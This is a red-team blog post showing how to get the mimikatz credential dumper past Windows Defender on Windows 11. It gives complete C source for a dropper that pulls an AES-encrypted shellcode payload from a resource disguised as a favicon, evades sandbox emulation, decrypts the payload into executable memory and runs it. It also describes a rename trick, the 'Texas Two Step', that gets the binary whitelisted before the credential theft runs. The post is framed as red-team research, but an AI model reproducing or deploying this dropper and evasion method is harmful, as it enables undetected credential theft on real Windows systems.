💀
0xTriboulet
  • Introduction
  • Achieving Access
    • achieving access: implantv1
    • achieving access: implantv2
    • achieving access: implantv3
  • Deceiving Defender
    • Deceiving Defender: Making nc.exe viable again
    • Deceiving Defender: Classic Bypass
    • Deceiving Defender: Name Bypass
    • Deceiving Defender: The Texas Two Step
    • Deceiving Defender: The Big Stack Bypass
      • Making Meterpreter Viable Again
    • Deceiving Defender: Meterpreter
  • Making Malware
    • making malware #0
    • making malware #1
    • making malware #2
  • Just Malicious
    • Advanced String Obfuscation
    • From C, with inline assembly, to shellcode
    • Thnks4RWX
  • TTPs
    • TTPs: Embedding Payloads with MSFVenom (x86)
    • TTPs: Embedding Payloads with MSFVenom (x64)
    • TTPs: Rust vs C++
    • TTPs: JmpNoCall
    • TTPs: BadAsm
    • TTPs: BadStrings
  • Unholy Unhooking
    • Unholy Unhooking: byoDLL
    • Unholy Unhooking: FrByoDLL
    • Unholy Unhooking: Rusty Fart
  • Weird Windows
    • Command Hijacking with .COM
    • Non-Existent File Paths
  • ZeroTotal
    • ZeroTotal: Msfvenom Calc
    • ZeroTotal: Self-Injecting Calc
    • ZeroTotal: Rusty Calc
  • Disclaimers
Powered by GitBook
On this page
  • Part Zero: Introduction
  • Part One: Recompiling
  • Part Two: Above…
  • Part Three: …and Beyond
  • Part Four: ????
  • Part Five: Profit???
  • Part Six: The Texas Two Step
  • Part Seven: Profit!
  • Part Eight: Conclusion
  • References

Deceiving Defender: The Texas Two Step

Utilizing a novel high-level methodology to bypass the increased protections of Windows Defender on Windows 11 systems in order to make mimikatz.exe viable again

PreviousDeceiving Defender: Name BypassNextDeceiving Defender: The Big Stack Bypass

Last updated 1 year ago

Part Zero: Introduction

Mimikatz is an open source offensive security solution that allows users to dump stored credentials or Kerberos tickets stored in memory.

Mimikatz is a powerful tool that is often used by Red Teams to extract credentials from a target system. However, due to the tool's popularity, it's often signatured by Windows Defender as a malicious binary. Because the PE is not survivable, it can become difficult to leverage the tool if Windows Defender is enabled on the target.

Part One: Recompiling

Thankfully, mimikatz is an open source tool so we can try to recompile the tool and see if that's enough to break the signature that Windows Defender uses to detect mimikatz.

We retarget the solution provided by the program author. For our purposes we're not interested in compiling for Windows XP, so we can use an updated Platform Toolset (v143).

We comment out a line here

And we turn off treating warnings as errors

Note: Be sure to do this for all of the project files (mimikatz, mimilove, etc)

We notice a size difference between the binary provided by the author and the binary we were able to generate, lets see how it fares against Windows Defender.

Part Two: Above…

Unfortunately, it doesn't seem like this is going to be enough to bypass Windows Defender.

Using ThreatCheck and Ghidra, we're able to identify the location of some bad instructions.

The strings give away the location of this portion of the code in the source.

After doing this a couple of times, we find that every string in mimikatz.exe is flagged. So at this point we can either continue to obfuscate every string in the source, or we can implement our defender bypasses. We're going to opt to implement a Windows Defender bypass. Let's try our classic bypasses.

Even after implementing these checks, we get caught by defender. Let's try something else.

Part Three: …and Beyond

There's another trick we have up our sleeves: encryption. The process goes something will go something like this:

  • Convert the mimikatz.exe into shellcode

  • Encrypt the shellcode

  • Load shell code into a dropper program

  • ????

  • Profit

Converting .exe to shellcode

We have use pe2shc to convert mimikatz.exe into a shell code. The process is pretty straight forward.

Encrypting the shellcode

We use standard aes encryption script written in python to encrypt our shellcode

Loading the shellcode into the dropper

Finally, we implement the code and it looks something like this:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wincrypt.h>
#include <shlwapi.h>
#include <winuser.h>
#include <psapi.h>

#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "advapi32")
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "shlwapi.lib")

#include "resources.h"


int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
        HCRYPTPROV hProv;
        HCRYPTHASH hHash;
        HCRYPTKEY hKey;

        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
                return -1;
        }
        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
                return -1;
        }
        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
                return -1;              
        }
        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
                return -1;
        }
        
        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, payload, &payload_len)){
                return -1;
        }
        
        CryptReleaseContext(hProv, 0);
        CryptDestroyHash(hHash);
        CryptDestroyKey(hKey);
        
        return 0;
}


int checkMe() {
	//check if being emulated

	//set up system structures, these will contain system data
	SYSTEM_INFO s;
	MEMORYSTATUSEX ms;
	DWORD procNum;
	char* mem = NULL;
	mem = (char*)malloc(6900000);

	unsigned char lpFileName[200];
	unsigned char * out;

	GetModuleFileName(NULL, (char*)lpFileName, sizeof(lpFileName));
	out = PathFindFileName(lpFileName);

	if (wcscmp(out, L"mimikatz.exe") == 0) {
		return -1;
	}
	
	if (mem <= 0) {
		return -1;
	}
	memset(mem, 69, 6900000);

	GetSystemInfo(&s);
	procNum = s.dwNumberOfProcessors;

	if (procNum < 2) {
		return -1;
	}

	free(mem);
	//MessageBox(NULL,NULL,NULL,MB_OK);
	return 0;
}


int main(void) {
	void * exec_mem;
	BOOL rv;
	HANDLE th;
    DWORD oldprotect = 0;
	
	unsigned char * payload;
	unsigned int payload_len;
	
	HGLOBAL resHandle = NULL;
	HRSRC res;

	char key[] = { 0x4c, 0xf9, 0x92, 0xca, 0x5, 0xba, 0x3c, 0x41, 0x32, 0x5, 0xf3, 0x4e, 0x27, 0xbd, 0x81, 0xa7 };

    if (checkMe() == 0){
		// Extract payload from resources section
		res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);
		resHandle = LoadResource(NULL, res);
		payload = (unsigned char *) LockResource(resHandle);
		payload_len = SizeofResource(NULL, res);
		
		// Allocate memory for payload
		exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
		
		
		// Copy payload to allocated buffer
		RtlMoveMemory(exec_mem, payload, payload_len);
		
		// Decrypt payload
		AESDecrypt((char *) exec_mem, payload_len, key, sizeof(key));
		
		// Make the buffer executable
		rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READWRITE, &oldprotect);

		// If all good, launch the payload
		if ( rv != 0 ) {
				th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
				WaitForSingleObject(th, -1);
		}
			
	}

	return 0;
}

We compile the above code

Part Four: ????

[Intentionally Left Blank]

Part Five: Profit???

And we now beat ThreatCheck!

And it looks like our file can survive on disk! But there's a problem.

If we run the program now, it'll get caught by Windows Defender. There's one more trick we can implement to bypass this.

Part Six: The Texas Two Step

Windows Defender only run its most expensive antivirus components on new executables. So if we insert fake code that we execute at run time, Windows Defender will register the signature of our executable as "safe" and we'll be free to do whatever we want on the system with our executable.

So we implement the following code:

unsigned char lpFileName[200];
unsigned char * out;

GetModuleFileName(NULL, (char*)lpFileName, sizeof(lpFileName));
out = PathFindFileName(lpFileName);

if (strcmp(out, "not_mimikatz.exe") == 0) {
	MessageBox(NULL,"SAFE","SAFE",MB_OK);
return 0;

This code checks if our executable is named "not_mimikatz.exe", and if so it executes "safe" functionality. Windows Defender will then register this executable as safe (the first step).

Then we rename the executable to "mimikatz.exe" and execute our malicious code (the second step). This is the Texas Two Step methodology for bypassing Windows Defender.

Part Seven: Profit!

(Windows 11) Texas Two Step, step 1:

(Windows 11) Texas Two Step, step 2:

Interestingly enough, the Texas Two Step is only necessary to bypass Windows Defender on Windows 11 systems. Windows 10 systems seem to determine if a binary is safe purely on the results of the Windows Defender scanning/emulation (which we bypass with our encryption).

Windows 11 systems on the other hand, further analyze an executable's functionality when first executed.

Part Eight: Conclusion

In this writeup, we saw one way that Windows Defender on Windows 11 provides greater protection that Windows Defender on Windows 10. We also saw how an attacker could bypass that protection and execute one of the most useful Red Teaming tools with the Texas Two Step.

Windows Defender does offer protection against some threats, but an adversary committed to bypassing those defenses can utilize this and other techniques in order to leverage the plethora of open source tools that exists to compromise systems.

References

Page cover image
LogoRed_Team_Code_Snippets/Cpp/hidden_mimikatz/wrapper at main · 0xTriboulet/Red_Team_Code_SnippetsGitHub
LogoReleases · hasherezade/pe_to_shellcodeGitHub
LogoGitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub